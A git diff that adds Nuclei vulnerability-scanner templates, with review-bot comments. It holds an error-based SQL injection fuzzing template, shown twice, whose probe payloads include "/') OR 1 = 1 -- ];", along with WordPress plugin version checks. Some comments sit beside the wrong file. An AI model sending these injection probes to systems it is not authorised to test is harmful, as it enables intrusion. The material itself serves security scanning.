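Review bot: The `name` was copied from the multi-plugin Wordfence record and says `Multiple Plugins <= (Various Versions)`, so the output line never tells the reader which plugin or which bound fired, even though the DSL pins this file to `enhanced-tooltipglossary` `<= 4.3.11`. Put the slug and bound in the title, e.g. `name: enhanced-tooltipglossary <= 4.3.11 - Reflected Cross-Site Scripting via cminds_free_guide Shortcode`. Three templates in this commit share the `341142a6…` id suffix because they come from one advisory; that is fine as long as each `name` identifies its own plugin.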
@@ -0,0 +1,508 @@ +id: error-sqli +info: + name: Blind SQL Injection time based detection of sql backend + author: oscuridad1010 + severity: High + tags: sql0 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + sqloscuridad: + - "'" + - "-1" + - "%22%22|0;#" + - "%22" + - "/') OR 1 = 1 -- ];" + - "%E2%84%A2%22" + - "%E2%84%A2%27" + + stop-at-first-match: true + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{sqloscuridad}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? 
SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - 
"Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - 
"encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + # HQL + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? 
SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + + - type: regex + name: MicrosoftAccess + regex: + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + + - type: regex + name: Oracle + regex: + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + + - type: regex + name: IBMDB2 + regex: + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + + - type: regex + name: Informix + regex: + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + + - type: regex + name: Firebird + regex: + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - 
"Pdo[./_\\\\]Firebird" + + - type: regex + name: SQLite + regex: + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + + - type: regex + name: SAPMaxDB + regex: + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + + - type: regex + name: Sybase + regex: + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + + - type: regex + name: Ingres + regex: + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + + - type: regex + name: FrontBase + regex: + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error \\[1-4\\]\\d{2}\\." 
+ + - type: regex + name: HSQLDB + regex: + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + + - type: regex + name: H2 + regex: + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + + - type: regex + name: MonetDB + regex: + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + + - type: regex + name: ApacheDerby + regex: + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + + - type: regex + name: Vertica + regex: + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + + - type: regex + name: Mckoi + regex: + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + + - type: regex + name: Presto + regex: + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + + - type: regex + name: Altibase + regex: + - "Altibase\\.jdbc\\.driver" + + - type: regex + name: MimerSQL + regex: + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + + - type: regex + name: CrateDB + regex: + - "io\\.crate\\.client\\.jdbc" + + - type: regex + name: Cache + regex: + - "encountered after end of query" + - "A comparison operator is required here" + + - type: regex + name: RaimaDatabaseManager + regex: + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + + - type: regex + name: Virtuoso + regex: + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + + - type: regex + name: HQLSQL + regex: + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - 
"mismatched input ''" + - '' + diff --git a/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml b/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml new file mode 100644 index 0000000000..5b7fae3efe --- /dev/null +++ b/poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml @@ -0,0 +1,59 @@ +id: nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169 + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Cross-Site Request Forgery to Plugin Setting Reset + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6d43ad-d1b9-4f66-ba08-d0ffc235f7c8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml b/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml new file mode 100644 index 0000000000..7605a82525 --- /dev/null +++ b/poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml 
@@ -0,0 +1,59 @@ +id: nokaut-offers-box-d698070b224b4726dbc297056bea4cbe + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e0dd2417-54b5-4838-88da-1893559bd255?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml b/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml new file mode 100644 index 0000000000..240903a856 --- /dev/null +++ b/poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml 
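Review bot: The `name` says `Authenticated (Administrator+) Stored Cross-Site Scripting`, but the check is an unauthenticated `readme.txt` version fingerprint (`compare_versions(version, '<= 1.4.0')`), so a hit proves an old version is installed, not that any XSS is reachable. Administrator-level stored XSS in WordPress is typically only a finding where the `unfiltered_html` capability has been removed (multisite or hardened installs), and the blank `description: >` should carry that caveat so the result is not escalated as unauthenticated XSS; e.g. `description: Version check only; the stored XSS requires an Administrator+ account and is generally relevant where unfiltered_html is disabled.`. As with the sibling template, `tags` carries `cve` while `cve-id` is empty.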
@@ -0,0 +1,59 @@ +id: twitter-posts-8f2dbde369351cc27693796adbcd9a58 + +info: + name: > + TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/twitter-posts/" + google-query: inurl:"/wp-content/plugins/twitter-posts/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,twitter-posts,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "twitter-posts" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/sql_injection/error-sqli.yaml b/poc/sql_injection/error-sqli.yaml new file mode 100644 index 0000000000..1b9ef0c64e --- /dev/null +++ b/poc/sql_injection/error-sqli.yaml 
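Review bot: `shodan-query: 'vuln:'` under `metadata` is a placeholder, not a valid Shodan query, and tooling that harvests template metadata for target discovery will emit it verbatim; replace it with a real one or drop the key, e.g. `shodan-query: http.html:"/wp-content/plugins/twitter-posts/"`. The two `version` extractors are identical apart from `internal: true`; the internal one is what `compare_versions(version, '<= 1.0.2')` consumes, so the second only duplicates the extracted value in output and can go. The `description: >` is empty; a one-liner saying the check is `readme.txt` `Stable tag` based and does not attempt the settings-update CSRF would keep readers from treating a hit as a confirmed exploit.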
@@ -0,0 +1,508 @@ +id: error-sqli +info: + name: Blind SQL Injection time based detection of sql backend + author: oscuridad1010 + severity: High + tags: sql0 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + sqloscuridad: + - "'" + - "-1" + - "%22%22|0;#" + - "%22" + - "/') OR 1 = 1 -- ];" + - "%E2%84%A2%22" + - "%E2%84%A2%27" + + stop-at-first-match: true + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{sqloscuridad}}" + + matchers-condition: and + matchers: + - type: word + words: + - "Adminer" + # False Positive + part: body + negative: true + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? 
SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - "weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - 
"Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." + # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - 
"encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + # HQL + - "org\\.hibernate\\.QueryException:" + - "org\\.hibernate\\.exception\\.SQLGrammarException" + - "mismatched input ''" + - '' + condition: or + + extractors: + - type: regex + name: MySQL + regex: + - "SQL syntax.*?MySQL" + - "You have an error in your SQL syntax" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE[\\d+]: Syntax error or access violation" + + - type: regex + name: MariaDB + regex: + - "check the manual that (corresponds to|fits) your MariaDB server version" + + - type: regex + name: Drizzel + regex: + - "check the manual that (corresponds to|fits) your Drizzle server version" + + - type: regex + name: MemSQL + regex: + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + + - type: regex + name: PostgreSQL + regex: + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." + - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + + - type: regex + name: MicrosoftSQLServer + regex: + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? 
